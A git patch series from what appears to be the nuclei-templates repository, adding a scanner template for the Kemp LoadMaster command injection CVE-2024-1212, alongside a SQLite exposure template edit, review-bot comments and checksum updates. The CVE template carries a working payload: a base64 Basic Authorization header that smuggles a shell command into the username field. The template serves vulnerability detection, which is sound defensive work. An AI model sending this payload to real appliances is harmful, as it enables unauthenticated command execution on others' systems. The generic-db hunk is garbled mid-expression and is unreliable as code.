+ severity: critical
+ description: |
+ Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
+ reference:
+ - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
+ - https://freeloadbalancer.com/
+ - https://kemptechnologies.com/
+ - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+ - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-1212
+ cwe-id: CWE-78
+ epss-score: 0.00046
+ epss-percentile: 0.13478
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"LoadMaster"
+ tags: cve,cve2024,progress,rce,loadmaster
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/access/set?param=enableapi&value=1"
+ headers:
+ Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bin"
+ - "mnt"
+ - "WWW-Authenticate: Basic"
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 717075e5b3a292a95612bb62de7ff3060e61b1ba Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Mar 2024 09:33:12 +0530
Subject: [PATCH 14/53] Update generic-db.yaml
---
 http/exposures/files/generic-db.yaml | 24 ++++++++---------------
 1 file changed, 8 insertions(+), 16 deletions(-)
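Review bot: The `info` block carries no remediation, although the linked Kemp release notice appears (from its URL) to name the fixed LMOS builds 7.2.59.2, 7.2.54.8 and 7.2.48.10; adding `remediation: |` with `Upgrade to LMOS 7.2.59.2, 7.2.54.8 or 7.2.48.10 (or later) and restrict network access to the LoadMaster management interface.` lets operators act on a finding directly. The request path `/access/set?param=enableapi&value=1` appears to be a configuration write rather than a read, so a sentence in `description` noting that a positive result implies a settings change on the target would help triage — this is not a side-effect-free probe. PATCH 15 on the following lines trims the references but leaves both points open.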
diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 811540a3c6..0ac1962fbf 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -1,7 +1,7 @@ id: generic-db info: - name: Generic DB file exposure + name: Generic Database File - Exposure author: Michal Mikolas (nanuqcz) severity: high description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. @@ -41,8 +41,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 metadata: - verified: true - tags: database,exposure,sqlite,sqlite3 + max-request: 89 + tags: files,database,exposure,sqlite,sqlite3 http: - method: GET @@ -140,19 +140,11 @@ http: - "{{BaseURL}}/database/production.db" - "{{BaseURL}}/database/production.sqlite3" - matchers-condition: and matchers: - - type: status - status: - - 200 - - # SQLite file always starts with "SQLite format {sqlite_version}" - type: dsl dsl: - - 'startswith(body, "SQLite format ")' - - # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - - type: word - part: body - words: - - "CREATE TABLE " + - 'startswith(body, "SQLite")' # SQLite file always starts with "SQLite format {sqlite_version}" + - 'contains(body, "CREATE TABLE")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table + - '!contains(body, " Date: Wed, 20 Mar 2024 09:36:02 +0530 Subject: [PATCH 15/53] Update CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index 6068d1e1b0..f2464b4726 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml 
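Review bot: Collapsing the three matchers into one `type: dsl` matcher with several `dsl:` entries changes the logic: with `matchers-condition: and` removed and no `condition: and` on the matcher, nuclei evaluates multiple `dsl` expressions with its default `or`, so the negative `!contains(body, …)` expression alone satisfies the matcher for almost any non-HTML error body across all 89 paths. Add `condition: and` under the `dsl:` list; the tail of this hunk is garbled in this rendering after `'!contains(body, "`, so if a `condition: and` already follows there this is handled, otherwise it is a real false-positive regression. The loosened `startswith(body, "SQLite")` also accepts bodies such as a plain-text `SQLite error …` message that the earlier `"SQLite format "` prefix rejected, and the dropped `status: 200` check is only safe to remove once the expressions are ANDed.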
@@ -1,17 +1,16 @@
 id: CVE-2024-1212
 
 info:
-  name: Progress Kemp LoadMaster - Unauthenticated Command Injection
+  name: Progress Kemp LoadMaster - Command Injection
   author: DhiyaneshDK
   severity: critical
   description: |
     Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
   reference:
     - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
-    - https://freeloadbalancer.com/
-    - https://kemptechnologies.com/
     - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
     - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-1212
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10
From 82925b02f81dfdf6832cd051937d49cae1aec923 Mon Sep 17 00:00:00 2001
From: "[PDBot]"
Date: Wed, 20 Mar 2024 04:11:42 +0000
Subject: [PATCH 16/53] Auto Generated New Template Addition List [Wed Mar 20 04:11:42 UTC 2024] :robot:
---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 4627f5e9d0..932ae622c6 100644
--- a/.new-additions
+++ b/.new-additions
@@ -27,6 +27,7 @@ file/keys/wireguard/wireguard-private.yaml
 http/cves/2023/CVE-2023-49785.yaml
 http/cves/2023/CVE-2023-5830.yaml
 http/cves/2023/CVE-2023-5914.yaml
+http/cves/2024/CVE-2024-1212.yaml
 http/cves/2024/CVE-2024-1698.yaml
 http/exposed-panels/bynder-panel.yaml
 http/exposed-panels/cisco/cisco-expressway-panel.yaml
From a35069ee22b0a20ebee646d2be759e8211c7ec44 Mon Sep 17 00:00:00 2001
From: GitHub Action Date: Wed, 20 Mar 2024 04:11:56 +0000 Subject: [PATCH 17/53] Auto Generated Templates Checksum [Wed Mar 20 04:11:56 UTC 2024] :robot: --- templates-checksum.txt | 75 +++++++++++++++++++++--------------------- 1 file changed, 38 insertions(+), 37 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7516f9bdb0..649fc4f262 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132 cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734 -cloud/enum/azure-vm-cloud-enum.yaml:69ca5c626f0061e4c9bcc922bf9e05f078459bd2 +cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9 cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204 cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41 cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4 @@ -1199,7 +1199,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6 http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790 http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215 http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8 -http/cves/2017/CVE-2017-17562.yaml:f73fd69cc36d28c4be6a6747c45f942f857029ef +http/cves/2017/CVE-2017-17562.yaml:2e22c184cd57f7425fba3827242a122c39dc86e8 http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8 http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e 
@@ -1496,7 +1496,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8 http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb -http/cves/2019/CVE-2019-17382.yaml:2a14f06044507c830b2d10f4a86315439d64f88f +http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808 http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195 http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 @@ -2398,7 +2398,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586 http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95 http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7 -http/cves/2022/CVE-2022-2034.yaml:db07244959fe5aec265a0b9f1e8b398a93a6076c +http/cves/2022/CVE-2022-2034.yaml:6d1a2c994d2ebda1cdcdc84b36237565c66c592a http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36 http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6 
@@ -2480,7 +2480,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74 http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848 http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:51779e43ad99b49a367ddd03a76fc22508c0c15c +http/cves/2022/CVE-2022-2599.yaml:f576fefcf8da91a4c868c4b06cad0a2ed36884cb http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505 http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae @@ -2819,7 +2819,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623 http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:ffcbd0678ae55a267244d0a62703c1756b701aae +http/cves/2023/CVE-2023-24489.yaml:c895cc71b777b3ada793ebcddd00274157f7927d http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40 
@@ -3085,6 +3085,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 +http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 @@ -3206,7 +3207,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43 http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79 -http/default-logins/oracle/peoplesoft-default-login.yaml:5da182e00f57e6927f30674cde5f7bae9de6bbd4 +http/default-logins/oracle/peoplesoft-default-login.yaml:21071ffc4b0449f88570d4d604038756ccd18209 http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025 
@@ -3292,7 +3293,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590 http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94 http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21 -http/exposed-panels/adminer-panel-detect.yaml:89f3dfcb1a75493cc7d806df52ee64b3e65450fa +http/exposed-panels/adminer-panel-detect.yaml:2c1c41366071aef22dcd3f0fb77608e8ba4d18d8 http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0 http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65 http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d @@ -4340,7 +4341,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03 http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 -http/exposures/backups/php-backup-files.yaml:505b1da333d78f3266443cab2fa4f9a6e57d6635 +http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e 
@@ -4822,19 +4823,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:55b0174b93ae85bcd2a5bd8dae8d5f2ee6dc183c -http/fuzzing/header-command-injection.yaml:531a6bae6185a29c431f42e8f2d0e4931ec82d05 -http/fuzzing/iis-shortname.yaml:3b02c03dfa0000145db4e569e9894ae9f9bfe4e0 -http/fuzzing/linux-lfi-fuzzing.yaml:98fb1f938fadd7dbef664b4fb90f70340998090d -http/fuzzing/mdb-database-file.yaml:f10257c4e4200709619934b82ad68db7c8ddf918 -http/fuzzing/prestashop-module-fuzz.yaml:7dad3e5599c90ca0dd227bebde42d56d3dc4fe8d -http/fuzzing/ssrf-via-proxy.yaml:61406c0b18b887b8b0820c01ccb006f25a8febf2 -http/fuzzing/valid-gmail-check.yaml:a9ddd0375c3160a61a5f2387c1113b9b64df8879 -http/fuzzing/waf-fuzz.yaml:d748d662ef552cee252b45d68017a09286c6eb93 -http/fuzzing/wordpress-plugins-detect.yaml:6a6a62082132ee13694282e8b77818db20ae5e64 -http/fuzzing/wordpress-themes-detect.yaml:bac6070c72b0db61adc5945ec1b14326c766cd14 -http/fuzzing/wordpress-weak-credentials.yaml:31dff20ca524cae856476baac860a09fd9a536ed -http/fuzzing/xff-403-bypass.yaml:debf58b69daf4676a60aba8af99fd6dc99df1d7d +http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e +http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3 +http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827 +http/fuzzing/linux-lfi-fuzzing.yaml:a92bbc9f1c966c3f909279c49e2dee0a2bfffac9 +http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13 +http/fuzzing/prestashop-module-fuzz.yaml:8e7f0e0bd609549e38f8eadc603360e8a56f2a02 +http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62 
+http/fuzzing/valid-gmail-check.yaml:a91c4df030cbeb5d163df9a3150cb146eb495412 +http/fuzzing/waf-fuzz.yaml:0bf3b44516d1eab46bbc11fb2eada0293c76a2ad +http/fuzzing/wordpress-plugins-detect.yaml:4bd980e6a9b9246896b0961dbff25a199038bcf0 +http/fuzzing/wordpress-themes-detect.yaml:86b90c67fd9c7fb48a6eff67fdb63a185f402ea8 +http/fuzzing/wordpress-weak-credentials.yaml:13dbc34b62167f75f802b83a3e71d89387ba54a6 +http/fuzzing/xff-403-bypass.yaml:23f78013ddcc53b07fbc3a114f0eaa45f90001d5 http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5 http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa @@ -4895,7 +4896,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:4bb02fec3ec11dcb407a956be1fc2f0a6bcc9897 +http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 
@@ -4912,7 +4913,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 -http/miscellaneous/ntlm-directories.yaml:8d2b0ffc05206f993712a9bbd94071107bcda074 +http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194 http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4 http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004 @@ -4958,7 +4959,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7 http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8 http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0 -http/misconfiguration/aem/aem-userinfo-servlet.yaml:47c5ab71db4a7fde4c72b30d1c273f2dc2e637b9 +http/misconfiguration/aem/aem-userinfo-servlet.yaml:4e42c3fd5d4ae21b1e0a686a35c69394d1d9d32b http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af 
@@ -5073,7 +5074,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3 http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5 -http/misconfiguration/gitlab/gitlab-user-enum.yaml:899a8a3e6898f4898986bb1bda5e248b360bd427 +http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a501e1c580757 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc 
@@ -5320,9 +5321,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417 http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1 -http/misconfiguration/proxy/open-proxy-internal.yaml:5de892d38ee34977924d4eb2cbd644b4b51fe567 -http/misconfiguration/proxy/open-proxy-localhost.yaml:4cd4b2b6c999578dff79a1d9d0aab65b759db464 -http/misconfiguration/proxy/open-proxy-portscan.yaml:e4806af440f78fced0b1239e83f9a5b440c4b4ee +http/misconfiguration/proxy/open-proxy-internal.yaml:231fecdb37f031eb304aba2267a8ba6ad16641ec +http/misconfiguration/proxy/open-proxy-localhost.yaml:583e013ed1b8deaaa42735861dc5201a8285afc6 +http/misconfiguration/proxy/open-proxy-portscan.yaml:790b7ea770648cb312cb5c103951c3c7254cb0c2 http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4 http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756 http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670 @@ -6447,7 +6448,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 -http/technologies/graylog/graylog-api-exposure.yaml:c669347801d0d2a1ec1f100228f4f48e99f28dd9 +http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9b3628b8c3d5e http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389 http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f 
@@ -7702,7 +7703,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc -http/vulnerabilities/tongda/tongda-auth-bypass.yaml:f661e567e8d9b51bdf29cc07155b552b92beab20 +http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27 http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd @@ -7944,7 +7945,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4 http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e -http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:9d1201fd282d799868a36ce2c49476f8c146711e +http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:a9c485aef2957f73eec1ea22a2b851f98284f9c9 http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074 http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f 
@@ -7985,13 +7986,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 -javascript/cves/2023/CVE-2023-34039.yaml:15973462461926ddb4e6991f45579aa54ae7fc29 +javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f -javascript/default-logins/ssh-default-logins.yaml:63a239d5a020912bf1e33b4ff59606e25181afe3 +javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 
